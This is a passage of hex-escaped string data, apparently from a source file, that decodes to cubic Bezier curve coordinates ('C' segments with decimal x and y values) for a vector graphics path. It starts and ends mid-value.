\x39\x36\x34\x35\x39\x33\x30\x35\x31\x20\x43\x20\x34\x2e\x30\x32\
\x37\x35\x35\x39\x37\x36\x35\x38\x36\x20\x31\x34\x2e\x39\x38\x34\
\x38\x30\x30\x35\x38\x37\x39\x20\x34\x2e\x30\x33\x33\x38\x30\x30\
\x38\x33\x34\x36\x39\x20\x31\x35\x2e\x30\x30\x34\x32\x38\x30\x39\
\x34\x30\x33\x20\x34\x2e\x30\x34\x30\x30\x34\x31\x39\x30\x33\x35\
\x33\x20\x31\x35\x2e\x30\x32\x33\x30\x32\x33\x34\x34\x36\x39\x20\
\x43\x20\x34\x2e\x30\x34\x36\x32\x38\x32\x39\x37\x32\x33\x37\x20\
\x31\x35\x2e\x30\x34\x31\x37\x36\x35\x39\x35\x33\x36\x20\x34\x2e\
\x30\x35\x32\x35\x32\x34\x30\x34\x31\x32\x20\x31\x35\x2e\x30\x35\
\x39\x37\x36\x36\x31\x37\x34\x35\x20\x34\x2e\x30\x35\x38\x37\x36\
\x35\x31\x31\x30\x30\x34\x20\x31\x35\x2e\x30\x37\x37\x30\x31\x34\
\x36\x37\x39\x20\x43\x20\x34\x2e\x30\x36\x35\x30\x30\x36\x31\x37\
\x38\x38\x37\x20\x31\x35\x2e\x30\x39\x34\x32\x36\x33\x31\x38\x33\
\x35\x20\x34\x2e\x30\x37\x31\x32\x34\x37\x32\x34\x37\x37\x31\x20\
\x31\x35\x2e\x31\x31\x30\x37\x35\x35\x34\x34\x38\x32\x20\x34\x2e\
\x30\x37\x37\x34\x38\x38\x33\x31\x36\x35\x35\x20\x31\x35\x2e\x31\
\x32\x36\x34\x38\x33\x32\x38\x38\x20\x43\x20\x34\x2e\x30\x38\x33\
\x37\x32\x39\x33\x38\x35\x33\x38\x20\x31\x35\x2e\x31\x34\x32\x32\
\x31\x31\x31\x32\x37\x38\x20\x34\x2e\x30\x38\x39\x39\x37\x30\x34\
\x35\x34\x32\x32\x20\x31\x35\x2e\x31\x35\x37\x31\x36\x39\x39\x34\
\x32\x39\x20\x34\x2e\x30\x39\x36\x32\x31\x31\x35\x32\x33\x30\x35\
\x20\x31\x35\x2e\x31\x37\x31\x33\x35\x32\x38\x30\x36\x31\x20\x43\
\x20\x34\x2e\x31\x30\x32\x34\x35\x32\x35\x39\x31\x38\x39\x20\x31\
\x35\x2e\x31\x38\x35\x35\x33\x35\x36\x36\x39\x33\x20\x34\x2e\x31\
\x30\x38\x36\x39\x33\x36\x36\x30\x37\x33\x20\x31\x35\x2e\x31\x39\
\x38\x39\x33\x37\x39\x31\x31\x35\x20\x34\x2e\x31\x31\x34\x39\x33\
\x34\x37\x32\x39\x35\x36\x20\x31\x35\x2e\x32\x31\x31\x35\x35\x33\
\x38\x37\x34\x33\x20\x43\x20\x34\x2e\x31\x32\x31\x31\x37\x35\x37\
\x39\x38\x34\x20\x31\x35\x2e\x32\x32\x34\x31\x36\x39\x38\x33\x37\
\x31\x20\x34\x2e\x31\x32\x37\x34\x31\x36\x38\x36\x37\x32\x33\x20\
\x31\x35\x2e\x32\x33\x35\x39\x39\x34\x37\x38\x39\x35\x20\x34\x2e\
\x31\x33\x33\x36\x35\x37\x39\x33\x36\x30\x37\x20\x31\x35\x2e\x32\
\x34\x37\x30\x32\x34\x33\x35\x30\x34\x20\x43\x20\x34\x2e\x31\x33\
\x39\x38\x39\x39\x30\x30\x34\x39\x31\x20\x31\x35\x2e\x32\x35\x38\
\x30\x35\x33\x39\x31\x31\x32\x20\x34\x2e\x31\x34\x36\x31\x34\x30\
\x30\x37\x33\x37\x34\x20\x31\x35\x2e\x32\x36\x38\x32\x38\x33\x32\
\x39\x34\x38\x20\x34\x2e\x31\x35\x32\x33\x38\x31\x31\x34\x32\x35\
\x38\x20\x31\x35\x2e\x32\x37\x37\x37\x30\x39\x34\x30\x34\x33\x20\
\x43\x20\x34\x2e\x31\x35\x38\x36\x32\x32\x32\x31\x31\x34\x31\x20\
\x31\x35\x2e\x32\x38\x37\x31\x33\x35\x35\x31\x33\x38\x20\x34\x2e\
\x31\x36\x34\x38\x36\x33\x32\x38\x30\x32\x35\x20\x31\x35\x2e\x32\
\x39\x35\x37\x35\x33\x35\x31\x36\x32\x20\x34\x2e\x31\x37\x31\x31\
\x30\x34\x33\x34\x39\x30\x39\x20\x31\x35\x2e\x33\x30\x33\x35\x36\
\x31\x36\x30\x33\x36\x20\x43\x20\x34\x2e\x31\x37\x37\x33\x34\x35\
\x34\x31\x37\x39\x32\x20\x31\x35\x2e\x33\x31\x31\x33\x36\x39\x36\
\x39\x31\x20\x34\x2e\x31\x38\x33\x35\x38\x36\x34\x38\x36\x37\x36\
\x20\x31\x35\x2e\x33\x31\x38\x33\x36\x32\x39\x39\x30\x36\x20\x34\
\x2e\x31\x38\x39\x38\x32\x37\x35\x35\x35\x35\x39\x20\x31\x35\x2e\
\x33\x32\x34\x35\x34\x30\x39\x38\x36\x32\x20\x43\x20\x34\x2e\x31\
\x39\x36\x30\x36\x38\x36\x32\x34\x34\x33\x20\x31\x35\x2e\x33\x33\
\x30\x37\x31\x38\x39\x38\x31\x38\x20\x34\x2e\x32\x30\x32\x33\x30\
\x39\x36\x39\x33\x32\x37\x20\x31\x35\x2e\x33\x33\x36\x30\x37\x36\
\x37\x36\x38\x33\x20\x34\x2e\x32\x30\x38\x35\x35\x30\x37\x36\x32\
\x31\x20\x31\x35\x2e\x33\x34\x30\x36\x31\x35\x31\x32\x32\x33\x20\
\x43\x20\x34\x2e\x32\x31\x34\x37\x39\x31\x38\x33\x30\x39\x34\x20\
\x31\x35\x2e\x33\x34\x35\x31\x35\x33\x34\x37\x36\x32\x20\x34\x2e\
\x32\x32\x31\x30\x33\x32\x38\x39\x39\x37\x37\x20\x31\x35\x2e\x33\
\x34\x38\x38\x36\x37\x34\x36\x37\x38\x20\x34\x2e\x32\x32\x37\x32\
\x37\x33\x39\x36\x38\x36\x31\x20\x31\x35\x2e\x33\x35\x31\x37\x35\
\x39\x31\x36\x34\x37\x20\x43\x20\x34\x2e\x32\x33\x33\x35\x31\x35\
\x30\x33\x37\x34\x35\x20\x31\x35\x2e\x33\x35\x34\x36\x35\x30\x38\
\x36\x31\x37\x20\x34\x2e\x32\x33\x39\x37\x35\x36\x31\x30\x36\x32\
\x38\x20\x31\x35\x2e\x33\x35\x36\x37\x31\x35\x33\x31\x37\x32\x20\
\x34\x2e\x32\x34\x35\x39\x39\x37\x31\x37\x35\x31\x32\x20\x31\x35\
\x2e\x33\x35\x37\x39\x35\x35\x38\x38\x37\x32\x20\x43\x20\x34\x2e\
\x32\x35\x32\x32\x33\x38\x32\x34\x33\x39\x35\x20\x31\x35\x2e\x33\
\x35\x39\x31\x39\x36\x34\x35\x37\x32\x20\x34\x2e\x32\x35\x38\x34\
\x37\x39\x33\x31\x32\x37\x39\x20\x31\x35\x2e\x33\x35\x39\x36\x30\
\x38\x31\x38\x35\x34\x20\x34\x2e\x32\x36\x34\x37\x32\x30\x33\x38\
\x31\x36\x33\x20\x31\x35\x2e\x33\x35\x39\x31\x39\x35\x37\x31\x30\
\x38\x20\x43\x20\x34\x2e\x32\x37\x30\x39\x36\x31\x34\x35\x30\x34\
\x36\x20\x31\x35\x2e\x33\x35\x38\x37\x38\x33\x32\x33\x36\x32\x20\
\x34\x2e\x32\x37\x37\x32\x30\x32\x35\x31\x39\x33\x20\x31\x35\x2e\
\x33\x35\x37\x35\x34\x31\x36\x30\x30\x37\x20\x34\x2e\x32\x38\x33\
\x34\x34\x33\x35\x38\x38\x31\x34\x20\x31\x35\x2e\x33\x35\x35\x34\
\x37\x36\x37\x31\x39\x31\x20\x43\x20\x34\x2e\x32\x38\x39\x36\x38\
\x34\x36\x35\x36\x39\x37\x20\x31\x35\x2e\x33\x35\x33\x34\x31\x31\
\x38\x33\x37\x35\x20\x34\x2e\x32\x39\x35\x39\x32\x35\x37\x32\x35\
\x38\x31\x20\x31\x35\x2e\x33\x35\x30\x35\x31\x38\x37\x35\x37\x36\
\x20\x34\x2e\x33\x30\x32\x31\x36\x36\x37\x39\x34\x36\x34\x20\x31\
\x35\x2e\x33\x34\x36\x38\x30\x34\x36\x36\x30\x39\x20\x43\x20\x34\
\x2e\x33\x30\x38\x34\x30\x37\x38\x36\x33\x34\x38\x20\x31\x35\x2e\
\x33\x34\x33\x30\x39\x30\x35\x36\x34\x31\x20\x34\x2e\x33\x31\x34\
\x36\x34\x38\x39\x33\x32\x33\x32\x20\x31\x35\x2e\x33\x33\x38\x35\
\x35\x30\x35\x31\x31\x39\x20\x34\x2e\x33\x32\x30\x38\x39\x30\x30\
\x30\x31\x31\x35\x20\x31\x35\x2e\x33\x33\x33\x31\x39\x32\x39\x34\
\x31\x32\x20\x43\x20\x34\x2e\x33\x32\x37\x31\x33\x31\x30\x36\x39\
\x39\x39\x20\x31\x35\x2e\x33\x32\x37\x38\x33\x35\x33\x37\x30\x36\
\x20\x34\x2e\x33\x33\x33\x33\x37\x32\x31\x33\x38\x38\x32\x20\x31\
\x35\x2e\x33\x32\x31\x36\x35\x35\x33\x36\x33\x39\x20\x34\x2e\x33\
\x33\x39\x36\x31\x33\x32\x30\x37\x36\x36\x20\x31\x35\x2e\x33\x31\
\x34\x36\x36\x32\x36\x30\x31\x20\x43\x20\x34\x2e\x33\x34\x35\x38\
\x35\x34\x32\x37\x36\x35\x20\x31\x35\x2e\x33\x30\x37\x36\x36\x39\
\x38\x33\x38\x31\x20\x34\x2e\x33\x35\x32\x30\x39\x35\x33\x34\x35\
\x33\x33\x20\x31\x35\x2e\x32\x39\x39\x38\x35\x39\x34\x33\x30\x31\
\x20\x34\x2e\x33\x35\x38\x33\x33\x36\x34\x31\x34\x31\x37\x20\x31\
\x35\x2e\x32\x39\x31\x32\x34\x32\x32\x38\x34\x33\x20\x43\x20\x34\
\x2e\x33\x36\x34\x35\x37\x37\x34\x38\x33\x20\x31\x35\x2e\x32\x38\
\x32\x36\x32\x35\x31\x33\x38\x35\x20\x34\x2e\x33\x37\x30\x38\x31\
\x38\x35\x35\x31\x38\x34\x20\x31\x35\x2e\x32\x37\x33\x31\x39\x36\
\x34\x30\x32\x34\x20\x34\x2e\x33\x37\x37\x30\x35\x39\x36\x32\x30\
\x36\x38\x20\x31\x35\x2e\x32\x36\x32\x39\x36\x38\x31\x39\x33\x39\
\x20\x43\x20\x34\x2e\x33\x38\x33\x33\x30\x30\x36\x38\x39\x35\x31\
\x20\x31\x35\x2e\x32\x35\x32\x37\x33\x39\x39\x38\x35\x35\x20\x34\
\x2e\x33\x38\x39\x35\x34\x31\x37\x35\x38\x33\x35\x20\x31\x35\x2e\
\x32\x34\x31\x37\x30\x37\x34\x39\x36\x31\x20\x34\x2e\x33\x39\x35\
\x37\x38\x32\x38\x32\x37\x31\x38\x20\x31\x35\x2e\x32\x32\x39\x38\
\x38\x34\x30\x33\x35\x37\x20\x43\x20\x34\x2e\x34\x30\x32\x30\x32\
\x33\x38\x39\x36\x30\x32\x20\x31\x35\x2e\x32\x31\x38\x30\x36\x30\
\x35\x37\x35\x33\x20\x34\x2e\x34\x30\x38\x32\x36\x34\x39\x36\x34\
\x38\x36\x20\x31\x35\x2e\x32\x30\x35\x34\x34\x31\x33\x38\x36\x35\
\x20\x34\x2e\x34\x31\x34\x35\x30\x36\x30\x33\x33\x36\x39\x20\x31\
\x35\x2e\x31\x39\x32\x30\x34\x30\x39\x35\x30\x37\x20\x43\x20\x34\
\x2e\x34\x32\x30\x37\x34\x37\x31\x30\x32\x35\x33\x20\x31\x35\x2e\
\x31\x37\x38\x36\x34\x30\x35\x31\x34\x38\x20\x34\x2e\x34\x32\x36\
\x39\x38\x38\x31\x37\x31\x33\x36\x20\x31\x35\x2e\x31\x36\x34\x34\
\x35\x34\x31\x33\x33\x33\x20\x34\x2e\x34\x33\x33\x32\x32\x39\x32\
\x34\x30\x32\x20\x31\x35\x2e\x31\x34\x39\x34\x39\x37\x34\x33\x36\
\x33\x20\x43\x20\x34\x2e\x34\x33\x39\x34\x37\x30\x33\x30\x39\x30\
\x34\x20\x31\x35\x2e\x31\x33\x34\x35\x34\x30\x37\x33\x39\x34\x20\
\x34\x2e\x34\x34\x35\x37\x31\x31\x33\x37\x37\x38\x37\x20\x31\x35\
\x2e\x31\x31\x38\x38\x30\x39\x30\x39\x34\x31\x20\x34\x2e\x34\x35\
\x31\x39\x35\x32\x34\x34\x36\x37\x31\x20\x31\x35\x2e\x31\x30\x32\
\x33\x31\x39\x32\x35\x35\x39\x20\x43\x20\x34\x2e\x34\x35\x38\x31\
\x39\x33\x35\x31\x35\x35\x34\x20\x31\x35\x2e\x30\x38\x35\x38\x32\
\x39\x34\x31\x37\x37\x20\x34\x2e\x34\x36\x34\x34\x33\x34\x35\x38\
\x34\x33\x38\x20\x31\x35\x2e\x30\x36\x38\x35\x37\x36\x38\x32\x36\
\x37\x20\x34\x2e\x34\x37\x30\x36\x37\x35\x36\x35\x33\x32\x32\x20\
\x31\x35\x2e\x30\x35\x30\x35\x37\x39\x33\x33\x37\x20\x43\x20\x34\
\x2e\x34\x37\x36\x39\x31\x36\x37\x32\x32\x30\x35\x20\x31\x35\x2e\
\x30\x33\x32\x35\x38\x31\x38\x34\x37\x34\x20\x34\x2e\x34\x38\x33\
\x31\x35\x37\x37\x39\x30\x38\x39\x20\x31\x35\x2e\x30\x31\x33\x38\
\x33\x34\x39\x37\x39\x34\x20\x34\x2e\x34\x38\x39\x33\x39\x38\x38\
\x35\x39\x37\x32\x20\x31\x34\x2e\x39\x39\x34\x33\x35\x37\x36\x35\
\x38\x36\x20\x43\x20\x34\x2e\x34\x39\x35\x36\x33\x39\x39\x32\x38\
\x35\x36\x20\x31\x34\x2e\x39\x37\x34\x38\x38\x30\x33\x33\x37\x39\
\x20\x34\x2e\x35\x30\x31\x38\x38\x30\x39\x39\x37\x34\x20\x31\x34\
\x2e\x39\x35\x34\x36\x36\x38\x31\x37\x31\x36\x20\x34\x2e\x35\x30\
\x38\x31\x32\x32\x30\x36\x36\x32\x33\x20\x31\x34\x2e\x39\x33\x33\
\x37\x34\x31\x31\x32\x37\x36\x20\x43\x20\x34\x2e\x35\x31\x34\x33\
\x36\x33\x31\x33\x35\x30\x37\x20\x31\x34\x2e\x39\x31\x32\x38\x31\
\x34\x30\x38\x33\x35\x20\x34\x2e\x35\x32\x30\x36\x30\x34\x32\x30\
\x33\x39\x20\x31\x34\x2e\x38\x39\x31\x31\x36\x37\x38\x36\x32\x38\
\x20\x34\x2e\x35\x32\x36\x38\x34\x35\x32\x37\x32\x37\x34\x20\x31\
\x34\x2e\x38\x36\x38\x38\x32\x33\x34\x34\x34\x32\x20\x43\x20\x34\
\x2e\x35\x33\x33\x30\x38\x36\x33\x34\x31\x35\x38\x20\x31\x34\x2e\
\x38\x34\x36\x34\x37\x39\x30\x32\x35\x37\x20\x34\x2e\x35\x33\x39\
\x33\x32\x37\x34\x31\x30\x34\x31\x20\x31\x34\x2e\x38\x32\x33\x34\
\x33\x32\x32\x31\x30\x39\x20\x34\x2e\x35\x34\x35\x35\x36\x38\x34\
\x37\x39\x32\x35\x20\x31\x34\x2e\x37\x39\x39\x37\x30\x34\x39\x35\
\x37\x37\x20\x43\x20\x34\x2e\x35\x35\x31\x38\x30\x39\x35\x34\x38\
\x30\x39\x20\x31\x34\x2e\x37\x37\x35\x39\x37\x37\x37\x30\x34\x34\
\x20\x34\x2e\x35\x35\x38\x30\x35\x30\x36\x31\x36\x39\x32\x20\x31\
\x34\x2e\x37\x35\x31\x35\x36\x35\x39\x32\x31\x31\x20\x34\x2e\x35\
\x36\x34\x32\x39\x31\x36\x38\x35\x37\x36\x20\x31\x34\x2e\x37\x32\
\x36\x34\x39\x32\x35\x31\x30\x34\x20\x43\x20\x34\x2e\x35\x37\x30\
\x35\x33\x32\x37\x35\x34\x35\x39\x20\x31\x34\x2e\x37\x30\x31\x34\
\x31\x39\x30\x39\x39\x38\x20\x34\x2e\x35\x37\x36\x37\x37\x33\x38\
\x32\x33\x34\x33\x20\x31\x34\x2e\x36\x37\x35\x36\x38\x30\x30\x38\
\x33\x35\x20\x34\x2e\x35\x38\x33\x30\x31\x34\x38\x39\x32\x32\x37\
\x20\x31\x34\x2e\x36\x34\x39\x32\x39\x39\x32\x37\x33\x36\x20\x43\
\x20\x34\x2e\x35\x38\x39\x32\x35\x35\x39\x36\x31\x31\x20\x31\x34\
\x2e\x36\x32\x32\x39\x31\x38\x34\x36\x33\x38\x20\x34\x2e\x35\x39\
\x35\x34\x39\x37\x30\x32\x39\x39\x34\x20\x31\x34\x2e\x35\x39\x35\
\x38\x39\x32\x30\x30\x31\x35\x20\x34\x2e\x36\x30\x31\x37\x33\x38\
\x30\x39\x38\x37\x37\x20\x31\x34\x2e\x35\x36\x38\x32\x34\x34\x35\
\x37\x31\x36\x20\x43\x20\x34\x2e\x36\x30\x37\x39\x37\x39\x31\x36\
\x37\x36\x31\x20\x31\x34\x2e\x35\x34\x30\x35\x39\x37\x31\x34\x31\
\x37\x20\x34\x2e\x36\x31\x34\x32\x32\x30\x32\x33\x36\x34\x35\x20\
\x31\x34\x2e\x35\x31\x32\x33\x32\x35\x30\x31\x30\x37\x20\x34\x2e\
\x36\x32\x30\x34\x36\x31\x33\x30\x35\x32\x38\x20\x31\x34\x2e\x34\
\x38\x33\x34\x35\x33\x36\x39\x37\x39\x20\x43\x20\x34\x2e\x36\x32\
\x36\x37\x30\x32\x33\x37\x34\x31\x32\x20\x31\x34\x2e\x34\x35\x34\
\x35\x38\x32\x33\x38\x35\x31\x20\x34\x2e\x36\x33\x32\x39\x34\x33\
\x34\x34\x32\x39\x35\x20\x31\x34\x2e\x34\x32\x35\x31\x30\x38\x32\
\x38\x38\x31\x20\x34\x2e\x36\x33\x39\x31\x38\x34\x35\x31\x31\x37\
\x39\x20\x31\x34\x2e\x33\x39\x35\x30\x35\x37\x37\x32\x31\x33\x20\
\x43\x20\x34\x2e\x36\x34\x35\x34\x32\x35\x35\x38\x30\x36\x33\x20\
\x31\x34\x2e\x33\x36\x35\x30\x30\x37\x31\x35\x34\x35\x20\x34\x2e\
\x36\x35\x31\x36\x36\x36\x36\x34\x39\x34\x36\x20\x31\x34\x2e\x33\
\x33\x34\x33\x37\x36\x36\x35\x32\x32\x20\x34\x2e\x36\x35\x37\x39\
\x30\x37\x37\x31\x38\x33\x20\x31\x34\x2e\x33\x30\x33\x31\x39\x33\
\x32\x38\x33\x33\x20\x43\x20\x34\x2e\x36\x36\x34\x31\x34\x38\x37\
\x38\x37\x31\x33\x20\x31\x34\x2e\x32\x37\x32\x30\x30\x39\x39\x31\
\x34\x34\x20\x34\x2e\x36\x37\x30\x33\x38\x39\x38\x35\x35\x39\x37\
\x20\x31\x34\x2e\x32\x34\x30\x32\x37\x30\x33\x35\x35\x32\x20\x34\
\x2e\x36\x37\x36\x36\x33\x30\x39\x32\x34\x38\x31\x20\x31\x34\x2e\
\x32\x30\x38\x30\x30\x32\x33\x38\x37\x20\x43\x20\x34\x2e\x36\x38\
\x32\x38\x37\x31\x39\x39\x33\x36\x34\x20\x31\x34\x2e\x31\x37\x35\
\x37\x33\x34\x34\x31\x38\x39\x20\x34\x2e\x36\x38\x39\x31\x31\x33\
\x30\x36\x32\x34\x38\x20\x31\x34\x2e\x31\x34\x32\x39\x33\x34\x38\
\x36\x35\x34\x20\x34\x2e\x36\x39\x35\x33\x35\x34\x31\x33\x31\x33\
\x31\x20\x31\x34\x2e\x31\x30\x39\x36\x33\x32\x31\x37\x37\x35\x20\
\x43\x20\x34\x2e\x37\x30\x31\x35\x39\x35\x32\x30\x30\x31\x35\x20\
\x31\x34\x2e\x30\x37\x36\x33\x32\x39\x34\x38\x39\x36\x20\x34\x2e\
\x37\x30\x37\x38\x33\x36\x32\x36\x38\x39\x39\x20\x31\x34\x2e\x30\
\x34\x32\x35\x32\x30\x36\x34\x33\x20\x34\x2e\x37\x31\x34\x30\x37\
\x37\x33\x33\x37\x38\x32\x20\x31\x34\x2e\x30\x30\x38\x32\x33\x34\
\x37\x31\x34\x33\x20\x43\x20\x34\x2e\x37\x32\x30\x33\x31\x38\x34\
\x30\x36\x36\x36\x20\x31\x33\x2e\x39\x37\x33\x39\x34\x38\x37\x38\
\x35\x36\x20\x34\x2e\x37\x32\x36\x35\x35\x39\x34\x37\x35\x34\x39\
\x20\x31\x33\x2e\x39\x33\x39\x31\x38\x32\x39\x30\x37\x33\x20\x34\
\x2e\x37\x33\x32\x38\x30\x30\x35\x34\x34\x33\x33\x20\x31\x33\x2e\
\x39\x30\x33\x39\x36\x36\x37\x33\x36\x35\x20\x43\x20\x34\x2e\x37\
\x33\x39\x30\x34\x31\x36\x31\x33\x31\x37\x20\x31\x33\x2e\x38\x36\
\x38\x37\x35\x30\x35\x36\x35\x38\x20\x34\x2e\x37\x34\x35\x32\x38\
\x32\x36\x38\x32\x20\x31\x33\x2e\x38\x33\x33\x30\x38\x31\x33\x39\
\x36\x34\x20\x34\x2e\x37\x35\x31\x35\x32\x33\x37\x35\x30\x38\x34\
\x20\x31\x33\x2e\x37\x39\x36\x39\x38\x39\x34\x32\x30\x35\x20\x43\
\x20\x34\x2e\x37\x35\x37\x37\x36\x34\x38\x31\x39\x36\x37\x20\x31\
\x33\x2e\x37\x36\x30\x38\x39\x37\x34\x34\x34\x35\x20\x34\x2e\x37\
\x36\x34\x30\x30\x35\x38\x38\x38\x35\x31\x20\x31\x33\x2e\x37\x32\
\x34\x33\x38\x30\x31\x32\x31\x31\x20\x34\x2e\x37\x37\x30\x32\x34\
\x36\x39\x35\x37\x33\x35\x20\x31\x33\x2e\x36\x38\x37\x34\x36\x38\
\x31\x33\x30\x35\x20\x43\x20\x34\x2e\x37\x37\x36\x34\x38\x38\x30\
\x32\x36\x31\x38\x20\x31\x33\x2e\x36\x35\x30\x35\x35\x36\x31\x33\
\x39\x39\x20\x34\x2e\x37\x38\x32\x37\x32\x39\x30\x39\x35\x30\x32\
\x20\x31\x33\x2e\x36\x31\x33\x32\x34\x37\x31\x31\x30\x36\x20\x34\
\x2e\x37\x38\x38\x39\x37\x30\x31\x36\x33\x38\x35\x20\x31\x33\x2e\
\x35\x37\x35\x35\x37\x32\x31\x36\x33\x35\x20\x43\x20\x34\x2e\x37\
\x39\x35\x32\x31\x31\x32\x33\x32\x36\x39\x20\x31\x33\x2e\x35\x33\
\x37\x38\x39\x37\x32\x31\x36\x33\x20\x34\x2e\x38\x30\x31\x34\x35\
\x32\x33\x30\x31\x35\x33\x20\x31\x33\x2e\x34\x39\x39\x38\x35\x34\
\x31\x35\x33\x20\x34\x2e\x38\x30\x37\x36\x39\x33\x33\x37\x30\x33\
\x36\x20\x31\x33\x2e\x34\x36\x31\x34\x37\x34\x34\x38\x36\x39\x20\
\x43\x20\x34\x2e\x38\x31\x33\x39\x33\x34\x34\x33\x39\x32\x20\x31\
\x33\x2e\x34\x32\x33\x30\x39\x34\x38\x32\x30\x38\x20\x34\x2e\x38\
\x32\x30\x31\x37\x35\x35\x30\x38\x30\x34\x20\x31\x33\x2e\x33\x38\
\x34\x33\x37\x36\x35\x32\x39\x39\x20\x34\x2e\x38\x32\x36\x34\x31\
\x36\x35\x37\x36\x38\x37\x20\x31\x33\x2e\x33\x34\x35\x33\x35\x31\
\x34\x37\x31\x37\x20\x43\x20\x34\x2e\x38\x33\x32\x36\x35\x37\x36\
\x34\x35\x37\x31\x20\x31\x33\x2e\x33\x30\x36\x33\x32\x36\x34\x31\
\x33\x35\x20\x34\x2e\x38\x33\x38\x38\x39\x38\x37\x31\x34\x35\x34\
\x20\x31\x33\x2e\x32\x36\x36\x39\x39\x32\x37\x34\x35\x34\x20\x34\
\x2e\x38\x34\x35\x31\x33\x39\x37\x38\x33\x33\x38\x20\x31\x33\x2e\
\x32\x32\x37\x33\x38\x32\x36\x31\x39\x36\x20\x43\x20\x34\x2e\x38\
\x35\x31\x33\x38\x30\x38\x35\x32\x32\x32\x20\x31\x33\x2e\x31\x38\
\x37\x37\x37\x32\x34\x39\x33\x38\x20\x34\x2e\x38\x35\x37\x36\x32\
\x31\x39\x32\x31\x30\x35\x20\x31\x33\x2e\x31\x34\x37\x38\x38\x34\
\x32\x35\x30\x31\x20\x34\x2e\x38\x36\x33\x38\x36\x32\x39\x38\x39\
\x38\x39\x20\x31\x33\x2e\x31\x30\x37\x37\x35\x30\x32\x38\x35\x36\
\x20\x43\x20\x34\x2e\x38\x37\x30\x31\x30\x34\x30\x35\x38\x37\x32\
\x20\x31\x33\x2e\x30\x36\x37\x36\x31\x36\x33\x32\x31\x31\x20\x34\
\x2e\x38\x37\x36\x33\x34\x35\x31\x32\x37\x35\x36\x20\x31\x33\x2e\
\x30\x32\x37\x32\x33\x35\x31\x36\x30\x36\x20\x34\x2e\x38\x38\x32\
\x35\x38\x36\x31\x39\x36\x34\x20\x31\x32\x2e\x39\x38\x36\x36\x33\
\x39\x33\x39\x36\x31\x20\x43\x20\x34\x2e\x38\x38\x38\x38\x32\x37\
\x32\x36\x35\x32\x33\x20\x31\x32\x2e\x39\x34\x36\x30\x34\x33\x36\
\x33\x31\x35\x20\x34\x2e\x38\x39\x35\x30\x36\x38\x33\x33\x34\x30\
\x37\x20\x31\x32\x2e\x39\x30\x35\x32\x33\x31\x39\x37\x34\x39\x20\
\x34\x2e\x39\x30\x31\x33\x30\x39\x34\x30\x32\x39\x20\x31\x32\x2e\
\x38\x36\x34\x32\x33\x37\x31\x36\x32\x38\x20\x43\x20\x34\x2e\x39\
\x30\x37\x35\x35\x30\x34\x37\x31\x37\x34\x20\x31\x32\x2e\x38\x32\
\x33\x32\x34\x32\x33\x35\x30\x37\x20\x34\x2e\x39\x31\x33\x37\x39\
\x31\x35\x34\x30\x35\x38\x20\x31\x32\x2e\x37\x38\x32\x30\x36\x33\
\x32\x38\x34\x32\x20\x34\x2e\x39\x32\x30\x30\x33\x32\x36\x30\x39\
\x34\x31\x20\x31\x32\x2e\x37\x34\x30\x37\x33\x32\x37\x39\x33\x39\
\x20\x43\x20\x34\x2e\x39\x32\x36\x32\x37\x33\x36\x37\x38\x32\x35\
\x20\x31\x32\x2e\x36\x39\x39\x34\x30\x32\x33\x30\x33\x35\x20\x34\
\x2e\x39\x33\x32\x35\x31\x34\x37\x34\x37\x30\x38\x20\x31\x32\x2e\
\x36\x35\x37\x39\x31\x39\x34\x38\x31\x34\x20\x34\x2e\x39\x33\x38\
\x37\x35\x35\x38\x31\x35\x39\x32\x20\x31\x32\x2e\x36\x31\x36\x33\
\x31\x37\x32\x30\x31\x20\x43\x20\x34\x2e\x39\x34\x34\x39\x39\x36\
\x38\x38\x34\x37\x36\x20\x31\x32\x2e\x35\x37\x34\x37\x31\x34\x39\
\x32\x30\x36\x20\x34\x2e\x39\x35\x31\x32\x33\x37\x39\x35\x33\x35\
\x39\x20\x31\x32\x2e\x35\x33\x32\x39\x39\x32\x34\x36\x36\x35\x20\
\x34\x2e\x39\x35\x37\x34\x37\x39\x30\x32\x32\x34\x33\x20\x31\x32\
\x2e\x34\x39\x31\x31\x38\x32\x37\x30\x34\x34\x20\x43\x20\x34\x2e\
\x39\x36\x33\x37\x32\x30\x30\x39\x31\x32\x36\x20\x31\x32\x2e\x34\
\x34\x39\x33\x37\x32\x39\x34\x32\x34\x20\x34\x2e\x39\x36\x39\x39\
\x36\x31\x31\x36\x30\x31\x20\x31\x32\x2e\x34\x30\x37\x34\x37\x35\
\x33\x35\x30\x33\x20\x34\x2e\x39\x37\x36\x32\x30\x32\x32\x32\x38\
\x39\x34\x20\x31\x32\x2e\x33\x36\x35\x35\x32\x32\x37\x33\x35\x37\
\x20\x43\x20\x34\x2e\x39\x38\x32\x34\x34\x33\x32\x39\x37\x37\x37\
\x20\x31\x32\x2e\x33\x32\x33\x35\x37\x30\x31\x32\x31\x31\x20\x34\
\x2e\x39\x38\x38\x36\x38\x34\x33\x36\x36\x36\x31\x20\x31\x32\x2e\
\x32\x38\x31\x35\x36\x32\x31\x35\x36\x20\x34\x2e\x39\x39\x34\x39\
\x32\x35\x34\x33\x35\x34\x34\x20\x31\x32\x2e\x32\x33\x39\x35\x33\
\x31\x35\x33\x38\x37\x20\x43\x20\x35\x2e\x30\x30\x31\x31\x36\x36\
\x35\x30\x34\x32\x38\x20\x31\x32\x2e\x31\x39\x37\x35\x30\x30\x39\
\x32\x31\x34\x20\x35\x2e\x30\x30\x37\x34\x30\x37\x35\x37\x33\x31\
\x32\x20\x31\x32\x2e\x31\x35\x35\x34\x34\x37\x35\x31\x38\x36\x20\
\x35\x2e\x30\x31\x33\x36\x34\x38\x36\x34\x31\x39\x35\x20\x31\x32\
\x2e\x31\x31\x33\x34\x30\x33\x38\x36\x39\x31\x20\x43\x20\x35\x2e\
\x30\x31\x39\x38\x38\x39\x37\x31\x30\x37\x39\x20\x31\x32\x2e\x30\
\x37\x31\x33\x36\x30\x32\x31\x39\x36\x20\x35\x2e\x30\x32\x36\x31\
\x33\x30\x37\x37\x39\x36\x32\x20\x31\x32\x2e\x30\x32\x39\x33\x32\
\x36\x33\x38\x34\x39\x20\x35\x2e\x30\x33\x32\x33\x37\x31\x38\x34\
\x38\x34\x36\x20\x31\x31\x2e\x39\x38\x37\x33\x33\x34\x36\x39\x33\
\x38\x20\x43\x20\x35\x2e\x30\x33\x38\x36\x31\x32\x39\x31\x37\x33\
\x20\x31\x31\x2e\x39\x34\x35\x33\x34\x33\x30\x30\x32\x36\x20\x35\
\x2e\x30\x34\x34\x38\x35\x33\x39\x38\x36\x31\x33\x20\x31\x31\x2e\
\x39\x30\x33\x33\x39\x33\x37\x31\x31\x36\x20\x35\x2e\x30\x35\x31\
